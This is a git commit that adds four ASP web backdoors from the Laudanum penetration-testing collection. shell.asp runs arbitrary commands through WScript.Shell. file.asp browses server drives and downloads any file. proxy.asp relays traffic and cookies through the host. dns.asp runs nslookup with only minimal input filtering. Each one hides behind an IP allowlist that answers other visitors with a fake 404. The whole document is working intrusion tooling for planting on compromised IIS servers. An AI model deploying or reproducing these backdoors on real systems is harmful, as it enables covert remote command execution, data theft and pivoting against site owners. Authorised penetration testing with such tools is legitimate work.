from laudanum-1.0

2025-02-16 16:28:23 +00:00 · 2016-03-09 19:19:38 -05:00 · 2016-03-09 19:19:38 -05:00 · 125bfea459
commit 125bfea459
parent 7d38604724
4 changed files with 869 additions and 0 deletions
--- a/web-backdoors/asp/dns.asp
+++ b/web-backdoors/asp/dns.asp
@ -0,0 +1,153 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@counterhack.com>
+' ***
+' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' *** This file provides access to DNS on the system.
+' *** Written by Tim Medin <tim@counterhack.com>
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+' ***************** Config entries below ***********************
+
+' IPs are enterable as individual addresses TODO: add CIDR support
+Dim allowedIPs 
+Dim allowed
+Dim qtypes
+Dim qtype
+Dim validtype
+Dim query
+Dim i
+Dim command
+
+allowedIPs = "192.168.0.1,127.0.0.1"
+' Just in cace you added a space in the line above
+allowedIPs = replace(allowedIPS," ","")
+'turn it into an array
+allowedIPs = split(allowedIPS,",") '
+
+' make sure the ip is allowed
+allowed = 0
+for i = lbound(allowedIPs) to ubound(allowedIPs)
+	if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
+		allowed = 1
+		Exit For
+	end if
+next
+' send a 404 if not the allowed IP
+if allowed = 0 then
+	Response.Status = "404 File Not Found"
+	Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
+	Response.End
+end if
+
+%>
+<html>
+<head>
+  <title>Laudanum ASP DNS Access</title>
+  <link rel="stylesheet" href="style.css" type="text/css">
+ 
+  <script type="text/javascript">
+    function init() {
+      document.dns.query.focus();
+    }
+  </script>
+</head>
+<body onload="init()">
+ 
+<h1>DNS Query 0.1</h1>
+<%
+
+' dns query types as defined as by windows nslookup
+qtypes = split ("ANY,A,AAAA,A+AAAA,CNAME,MX,NS,PTR,SOA,SRV",",")
+qtype = UCase(Request.Form("type"))
+
+' see if the query type is valid, if it isn't then set it.
+validtype = 0
+for i = lbound(qtypes) to ubound(qtypes)
+	if qtype = qtypes(i) then
+		validtype = 1
+		Exit For
+	end if 
+next
+if validtype = 0 then qtype = "ANY"
+
+%>
+<form name="dns" method="POST">
+<fieldset>
+  <legend>DNS Lookup:</legend>
+  <p>Query:<input name="query" type="text">
+  Type:<select name="type">
+<%
+for i = lbound(qtypes) to ubound(qtypes)
+	if qtype = qtypes(i) then
+		Response.Write("<option value=""" & qtypes(i) & """ SELECTED>" & qtypes(i) & "</option>")
+	else
+		
+		Response.Write("<option value=""" & qtypes(i) & """>" & qtypes(i) & "</option>")
+	end if
+next
+%>
+  </select>
+  <input type="submit" value="Submit">
+</fieldset>
+</form>
+<%
+
+' get the query
+query = trim(Request.Form("query"))
+' the query must be sanitized a bit to try to make sure the shell doesn't hang
+query = replace(query, " ", "")
+query = replace(query, ";", "")
+
+if len(query) > 0 then
+	command = "nslookup -type=" & qtype & " " & query 
+	Set objWShell = Server.CreateObject("WScript.Shell")
+	Set objCmd = objWShell.Exec(command)
+	strPResult = objCmd.StdOut.Readall()
+	set objCmd = nothing: Set objWShell = nothing
+	%><pre><%
+	Response.Write command & "<br>"
+	Response.Write replace(strPResult,vbCrLf,"<br>")
+	%></pre><%
+end if
+%>
+ <hr/>
+  <address>
+  Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+  Written by Tim Medin.<br/>
+  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+  </address>
+
+</body>
+</html>
+
--- a/web-backdoors/asp/file.asp
+++ b/web-backdoors/asp/file.asp
@ -0,0 +1,179 @@
+<%@Language="VBScript"%>
+<%Option Explicit%>
+<%Response.Buffer = True%>  
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@counterhack.com>
+' ***
+' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' *** This file provides access to the file system.
+' *** Written by Tim Medin <tim@counterhack.com>
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+' ***************** Config entries below ***********************
+
+' Define variables
+Dim allowedIPs 
+Dim allowed
+Dim filepath
+Dim file
+Dim stream
+Dim path
+Dim i
+Dim fso
+Dim folder 
+Dim list
+Dim temppath
+
+' IPs are enterable as individual addresses TODO: add CIDR support
+allowedIPs = "192.168.0.1,127.0.0.1,::1"
+' Just in cace you added a space in the line above
+allowedIPs = replace(allowedIPS," ","")
+'turn it into an array
+allowedIPs = split(allowedIPS,",") '
+' make sure the ip is allowed
+allowed = 0
+for i = lbound(allowedIPs) to ubound(allowedIPs)
+	if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
+		allowed = 1
+		exit for
+	end if
+next
+' send a 404 if the IP Address is not allowed
+if allowed = 0 then
+	Response.Status = "404 File Not Found"
+	Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
+	Response.End
+end if
+
+' create file object for use everywhere
+set fso = CreateObject("Scripting.FileSystemObject")
+
+' download a file if selected
+filepath = trim(Request.QueryString("file"))
+'validate file
+if len(filepath) > 0 then
+	if fso.FileExists(filepath) then
+		'valid file
+
+		Set file = fso.GetFile(filepath)
+		Response.AddHeader "Content-Disposition", "attachment; filename=" & file.Name  
+		'Response.AddHeader "Content-Length", file.Size  
+		Response.ContentType = "application/octet-stream"
+		set stream = Server.CreateObject("ADODB.Stream")
+		stream.Open
+		stream.Type = 1
+		Response.Charset = "UTF-8"
+		stream.LoadFromFile(file.Path)
+		' TODO: Downloads for files greater than 4Mb may not work since the default buffer limit in IIS is 4Mb.
+ 		Response.BinaryWrite(stream.Read)
+		stream.Close
+		set stream = Nothing
+		set file = Nothing
+		Response.End
+	end if
+end if
+
+' begin rendering the page
+%>
+<html>
+<head>
+  <title>Laudanum ASP File Browser</title>
+</head>
+<body>
+
+<h1>Laudanum File Browser 0.1</h1>
+
+<%
+' get the path to work with, if it isn't set or valid then start with the web root
+' goofy if statement is used since vbscript doesn't use short-curcuit logic
+path = trim(Request.QueryString("path"))
+if len(path) = 0 then
+	path = fso.GetFolder(Server.MapPath("\"))
+elseif not fso.FolderExists(path) then
+	path = fso.GetFolder(Server.MapPath("\"))
+end if
+
+set folder = fso.GetFolder(path)
+
+' Special locations, webroot and drives
+%><b>Other Locations:</b> <%
+for each i in fso.Drives
+	if i.IsReady then
+		%><a href="<%=Request.ServerVariables("URL") & "?path=" & i.DriveLetter%>:\"><%=i.DriveLetter%>:</a>&nbsp;&nbsp;<%
+	end if
+next
+%><a href="<%=Request.ServerVariables("URL")%>">web root</a><br/><%
+
+' Information on folder
+%><h2>Listing of: <%
+list = split(folder.path, "\")
+temppath = ""
+for each i in list
+	temppath = temppath & i & "\"
+	%><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(temppath)%>"><%=i%>\</a> <%
+next
+%></h2><%
+
+' build table for listing
+%><table>
+<tr><th align="left">Name</th><th>Size</th><th>Modified</th><th>Accessed</th><th>Created</th></tr><%
+' Parent Path if it exists
+if not folder.IsRootFolder then
+	%><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(folder.ParentFolder.Path)%>">..</a></td><%
+end if
+
+' Get the folders
+set list = folder.SubFolders
+for each i in list
+        %><tr><td><a href="<%=Request.ServerVariables("URL") & "?path=" & Server.URLEncode(i.Path)%>"><%=i.Name%>\</a></td></tr><%
+next
+
+' Get the files
+set list = folder.Files
+for each i in list
+        %><tr><td><a href="<%=Request.ServerVariables("URL") & "?file=" & Server.URLEncode(i.Path)%>"><%=i.Name%></a></td><td align="right"><%=FormatNumber(i.Size, 0)%></td><td align="right"><%=i.DateLastModified%></td><td align="right"><%=i.DateLastAccessed%></td><td align="right"><%=i.DateCreated%></td></tr><%
+next
+
+' all done
+%>
+ </table>
+ <hr/>
+  <address>
+  Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+  Written by Tim Medin.<br/>
+  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+  </address>
+
+</body>
+</html>
--- a/web-backdoors/asp/proxy.asp
+++ b/web-backdoors/asp/proxy.asp
@ -0,0 +1,454 @@
+<%@Language="VBScript"%>
+<%Option Explicit%>
+<%Response.Buffer = True%>  
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@counterhack.com>
+' ***
+' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' *** This file provides access as a proxy.
+' *** Written by Tim Medin <tim@counterhack.com>
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+ 
+' ***************** Config entries below ***********************
+
+' Define variables
+Dim allowedIPs 
+Dim allowed
+Dim i
+Dim s 'generic string, yeah, I know bad, but at this point I just want it to work
+Dim urltemp 
+Dim urlscheme
+Dim urlhost
+Dim urlport
+Dim urlpath
+Dim urlfile
+Dim urlquery
+Dim http 
+Dim method
+Dim contenttype
+Dim stream
+Dim regex
+Dim body
+Dim params
+
+function err_handler()
+	%>
+<html>
+<head>
+  <title>Laudanum ASP Proxy</title>
+</head>
+<body>
+  <h1>Fatal Error!</h1>
+  <%=Err.Number%><br/>
+  <%=Err.Message%><br/>
+  <hr/>
+  <address>
+  Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+  Written by Tim Medin.<br/>
+  Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+  </address>
+</body>
+</html><%
+end function
+
+function CleanQueryString
+' removes laudurl from the querystring
+Dim i
+Dim j
+Dim s
+Dim key
+Dim q
+
+
+	if len(request.querystring) = 0 then
+		CleanQueryString = ""
+		exit function
+	end if
+
+	' build the request parameters
+	for i = 1 to request.querystring.count
+		key = request.querystring.key(i)
+		'response.write "<br/>key:" & key
+		if key = "laudurl" then
+			' if the key is laudurl, we need check if there is a ? in the string since 
+			' it may have its own query string that doesn't get parsed properly.
+			s = split(request.querystring("laudurl"), "?")
+			if ubound(s) > lbound(s) then
+				' laudurl contains a ?, it must be manually parsed
+				key = left(s(1), instr(s(1), "=") - 1)
+				q = q & "&" & key & "=" & mid(s(1), len(key) + 2)
+			end if
+		else
+			for j = 1 to request.querystring(key).count
+                               	'response.write "<br/>  -value:" & request.querystring(key)(j)
+				q = q & "&" & key & "=" & request.querystring(key)(j)
+			next
+		end if
+	next
+
+	if len(q) > 0 then
+		CleanQueryString = "?" & mid(q, 2)
+	else
+		CleanQueryString = ""
+	end if
+end function
+ 
+function CleanFormValues()
+Dim r
+	Set r = New RegExp
+	r.IgnoreCase = true
+	r.Global = true
+
+	' remove the laudurl paramater 
+	r.Pattern = "laudurl=[^&]+($|&)"
+	CleanFormValues = r.Replace(request.form, "") 
+	Set r = nothing
+end function
+
+sub ParseUrl()
+' parses the url into the global variables
+Dim urltemp
+Dim url
+
+	'get the url, it may be in the querystring for a get or from a form in a post
+	url = Request.QueryString("laudurl")
+	if url = "" then
+		url = Request.Form("laudurl")
+	end if
+
+	if url = "" then
+		urlscheme = ""
+		urlhost = ""
+		urlport = ""
+		urlpath = ""
+		urlfile = ""
+		urlquery = ""
+		exit sub
+	end if	
+
+	' Parse the url and break it into its components
+	' this is done so it can be used to rewrite the page
+
+	' ensure the url has a scheme, if it doesn't then assume http
+	if instr(url,"://") = 0 then url = "http://" + url
+
+	' Get the scheme
+	urlscheme = split(url, "://")(0) & "://"
+
+	' urltemp is used to hold the remainder of the url as each portion is parsed
+	urltemp = mid(url, len(urlscheme) + 1)
+	'get the host
+	if instr(urltemp, "/") = 0 then
+		' there is no path so all that is left is the host
+		urlhost = urltemp
+		urlport = ""
+		urlpath = "/"
+		urlfile = ""
+		urlport = ""
+	else
+		' there is more that just the hostname remaining
+		urlhost = left(urltemp, instr(urltemp, "/") - 1)
+		urltemp = mid(urltemp, len(urlhost) + 1)
+
+		' is there a port
+		if instr(urlhost, ":") = 0 then
+			' no port
+			urlport = ""
+		else
+			' there is a port
+			arr = split(urlhost, ":")
+			urlhost = arr(0)
+			urlport = ":" & arr(1)
+		end if
+
+		' all that is left is the path and the query
+		' is there a query?
+		if instr(urltemp, "?") = 0 then
+			' no query
+			urlpath = urltemp
+			'urlquery = ""
+		else
+			'Response.Write "<br><br>" & urltemp & "<br><br>"
+			urlpath = left(urltemp, instr(urltemp, "?") - 1)
+			'urlquery = mid(urltemp, instr(urltemp, "?") + 1)
+		end if
+		
+		if right(urlpath, 1) = "/" then
+			urlfile = ""
+		else
+			' we need to get the path and the file
+			urltemp = split(urlpath, "/")
+			urlfile = urltemp(ubound(urltemp))
+			urlpath = left(urlpath, len(urlpath) - len(urlfile))
+		end if
+	end if 
+
+	urlquery = CleanQueryString
+
+	'response.write "<br>scheme: " & urlscheme
+	'response.write "<br>host: " & urlhost
+	'response.write "<br>port: " & urlport
+	'response.write "<br>path: " & urlpath
+	'response.write "<br>file: " & urlfile
+	'response.write "<br>query: " & urlquery 
+	'response.write "<br>full: " & FullUrl()
+	'response.end
+end sub
+
+function FullUrl()
+	FullUrl = urlscheme & urlhost & urlport & urlpath & urlfile & urlquery
+end function
+
+sub RewriteHeaders()
+Dim i
+Dim header
+Dim headervalue
+Dim regexdomain
+Dim regexpath
+
+	' setup a regular expression to clean the cookie's domain and path
+	Set regexdomain = New RegExp
+	regexdomain.IgnoreCase = true
+	regexdomain.Global = true
+	' rewrite images and links - absolute reference
+	regexdomain.Pattern = "domain=[\S]+"
+
+	Set regexpath = New RegExp
+	regexpath.IgnoreCase = true
+	regexpath.Global = true
+	' rewrite images and links - absolute reference
+	regexpath.Pattern = "path=[\S]+"
+
+	' go through each header
+	for each i in Split(http.getAllResponseHeaders, vbLf)
+		' Break on the \x0a and remove the \x0d if it exists
+		i = Replace(i, vbCr, "")
+		' make sure it is a header and value
+		if instr(i, ":") > 0 then
+			' break the response headers into header and value 
+			header = trim(Left(i, instr(i, ":") - 1))
+			header = replace(header, "_", "-")
+			headervalue = trim(Right(i, len(i) - instr(i, ":")))
+
+			' don't add these two header types since they are handled automatically
+			if lcase(header) <> "content-type" and lcase(header) <> "content-length" and lcase(header) <> "transfer-encoding" then
+				if lcase(header) = "set-cookie" then
+					' strip the domain from the cookie
+					headervalue = regexdomain.replace(headervalue, "")
+					' strip the path from the cookie
+					headervalue = regexpath.replace(headervalue, "")
+					headervalue = trim(headervalue)
+				end if
+				response.AddHeader header, headervalue
+			end if
+		end if
+	next
+	
+	Set regexdomain = nothing
+	Set regexpath = nothing
+end sub
+
+' TODO: Add authentication support so it will work behind a proxy
+' IPs are enterable as individual addresses TODO: add CIDR support
+allowedIPs = "192.168.0.1,127.0.0.1,::1"
+' Just in cace you added a space in the line above
+allowedIPs = replace(allowedIPS," ","")
+'turn it into an array
+allowedIPs = split(allowedIPS,",") '
+' make sure the ip is allowed
+' TODO: change this to 0 for production, it is 1 for testing
+allowed = 0 
+for i = lbound(allowedIPs) to ubound(allowedIPs)
+        if allowedIPS(i) = Request.ServerVariables("REMOTE_ADDR") then
+                allowed = 1
+                exit for
+        end if
+next
+' send a 404 if the IP Address is not allowed
+if allowed = 0 then
+        Response.Status = "404 File Not Found"
+        Response.Write(Response.Status & Request.ServerVariables("REMOTE_ADDR"))
+        Response.End
+end if
+
+
+'initialize variables
+Set http = nothing
+Set regex = nothing
+Set stream = nothing
+
+' Define Constants
+const useMSXML2 = 0
+const chunkSize = 1048576 ' 1MB
+
+' parse the url into its parts
+ParseUrl()
+
+' check if there is a valid url
+if len(FullUrl) = 0 then
+	' no url to proxy, give `em the boring default page
+	
+	' Default layout of the page
+	' First thing you get when you hit the page without giving it a URL
+	%>
+	<html>
+	<head>
+		<title>Laudanum ASP Proxy</title>
+		<script type="text/javascript">
+			function init() {
+				document.proxy.url.focus();
+			}
+		</script>
+	</head>
+	<body onload="init()">
+ 
+	<h1>Laudanum ASP Proxy</h1>
+ 
+	<form method="GET" name="proxy" action="<%=Request.ServerVariables("URL")%>">
+		<input type="text" name="laudurl" size="70">
+		<input type="submit" value="Submit">
+	</form>
+	<hr/>
+	<address>
+		Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+		Written by Tim Medin.<br/>
+		Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+	</address>
+	</body>
+	</html>	<%
+
+	Response.End()
+end if
+
+' Let's get our Proxy on!!!
+' define the request type
+if useMSXML2 = 1 then
+	Set http = Server.CreateObject("MSXML2.XMLHTTP")
+else
+	Set http = Server.CreateObject("Microsoft.XMLHTTP")
+end if
+
+' get the request type
+method = Request.ServerVariables("REQUEST_METHOD")
+
+' setup the request, false means don't send it yet
+http.Open method, FullUrl, False
+
+' send the request
+if method = "POST" then
+	params = CleanFormValues
+	http.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
+	http.setRequestHeader "Content-length", len(params)
+	http.setRequestHeader "Connection", "close"
+	http.Send(params)
+else
+	http.Send
+end if
+
+' Replace the normal headers with the ones from the response
+Response.Clear
+contenttype = http.getResponseHeader("Content-Type")
+Response.ContentType = contenttype
+
+' rewrite the headers. Takes headers and passes them to new request
+RewriteHeaders()
+
+' how to respond? is it text or is it something else?
+if lcase(left(contenttype, 4)) = "text" then
+	' response is text, so we need to rewrite it, but that's later
+	
+
+	' do the rewriting
+	body = http.responseText
+
+	Set regex = New RegExp
+	regex.IgnoreCase = true
+	regex.Global = true
+
+	' rewrite images and links - absolute reference
+	s = urlscheme & urlhost & urlport
+	regex.Pattern = "((src|href).?=.?['""])(\/[^'""]+['""])"
+	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") 
+
+	' rewrite images and links - full reference
+	regex.Pattern = "((src|href).?=.?['""])(http[^'""]+['""])"
+	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=$3") 
+
+	' rewrite images and links - absolute reference
+	s = urlscheme & urlhost & urlport & urlpath
+	regex.Pattern = "((src|href).?=.?['""])([^\/][^'""]+['""])"
+	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "?laudurl=" & s & "$3") 
+
+
+	' rewrite forms - absolute reference
+	s = urlscheme & urlhost & urlport
+	regex.Pattern = "(\<form[^\>]+action.?=.?['""])(\/[^'""]+)(['""][^\>]*[\>])"
+	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">") 
+
+	' rewrite forms - full reference
+	regex.Pattern = "(\<form[^\>]+action.?=.?['""])(http[^'""]+)(['""][^\>]*[\>])"
+	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""$2"">") 
+
+	' rewrite forms - absolute reference
+	s = urlscheme & urlhost & urlport & urlpath
+	regex.Pattern = "(\<form[^\>]+action.?=.?['""])([^\/][^'""]+)(['""][^\>]*[\>])"
+	body = regex.Replace(body, "$1" & Request.ServerVariables("SCRIPT_NAME") & "$3<input type=""hidden"" name=""laudurl"" value=""" & s & "$2"">") 
+
+	Response.Write(body)
+	
+	Set regex = nothing
+else
+	' some sort of binary response, so stream it
+	Set stream = nothing
+	Set stream = Server.CreateObject("ADODB.Stream")
+	stream.Type = 1 'Binary
+	stream.Open
+	stream.Write http.responseBody
+	stream.Position = 0
+
+	For i = 0 to stream.Size \ chunkSize
+		Response.BinaryWrite(stream.Read(chunkSize))
+	next
+	Set stream = nothing
+end if
+
+Set http = nothing
+
+Response.End
+
+:HandleError
+err_handler
+
+%>
+
--- a/web-backdoors/asp/shell.asp
+++ b/web-backdoors/asp/shell.asp
@ -0,0 +1,83 @@
+<%
+' *******************************************************************************
+' ***
+' *** Laudanum Project
+' *** A Collection of Injectable Files used during a Penetration Test
+' ***
+' *** More information is available at:
+' ***  http://laudanum.secureideas.net
+' ***  laudanum@secureideas.net
+' ***
+' ***  Project Leads:
+' ***         Kevin Johnson <kjohnson@secureideas.net
+' ***         Tim Medin <tim@counterhack.com>
+' ***
+' *** Copyright 2014 by Kevin Johnson and the Laudanum Team
+' ***
+' ********************************************************************************
+' ***
+' ***   Updated and fixed by Robin Wood <Digininja>
+' ***   Updated and fixed by Tim Medin <tim@counterhack.com
+' ***
+' ********************************************************************************
+' *** This program is free software; you can redistribute it and/or
+' *** modify it under the terms of the GNU General Public License
+' *** as published by the Free Software Foundation; either version 2
+' *** of the License, or (at your option) any later version.
+' ***
+' *** This program is distributed in the hope that it will be useful,
+' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
+' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+' *** GNU General Public License for more details.
+' ***
+' *** You can get a copy of the GNU General Public License from this
+' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
+' *** You can also write to the Free Software Foundation, Inc., Temple
+' *** Place - Suite  Boston, MA   USA.
+' ***
+' ***************************************************************************** */
+
+
+' can set this to 0 for never time out but don't want to kill the server if a script
+' goes into a loop for any reason
+Server.ScriptTimeout = 180
+
+ip=request.ServerVariables("REMOTE_ADDR")
+if ip<>"1.2.3.4" then
+ response.Status="404 Page Not Found"
+ response.Write(response.Status)
+ response.End
+end if
+
+if Request.Form("submit") <> "" then
+   Dim wshell, intReturn, strPResult
+   cmd = Request.Form("cmd")
+   Response.Write ("Running command: " & cmd & "<br />")
+   set wshell = CreateObject("WScript.Shell")
+   Set objCmd = wShell.Exec(cmd)
+   strPResult = objCmd.StdOut.Readall()
+
+   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
+
+   set wshell = nothing
+end if
+
+%>
+<html>
+<head><title>Laundanum ASP Shell</title></head>
+<body onload="document.shell.cmd.focus()">
+<form action="shell.asp" method="POST" name="shell">
+Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
+<input type="submit" name="submit" value="Submit" />
+<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
+<p>Example command to do a directory listing:<br>
+%ComSpec% /c dir
+</form>
+<hr/>
+<address>
+Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
+Written by Tim Medin.<br/>
+Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
+</address>
+</body>
+</html>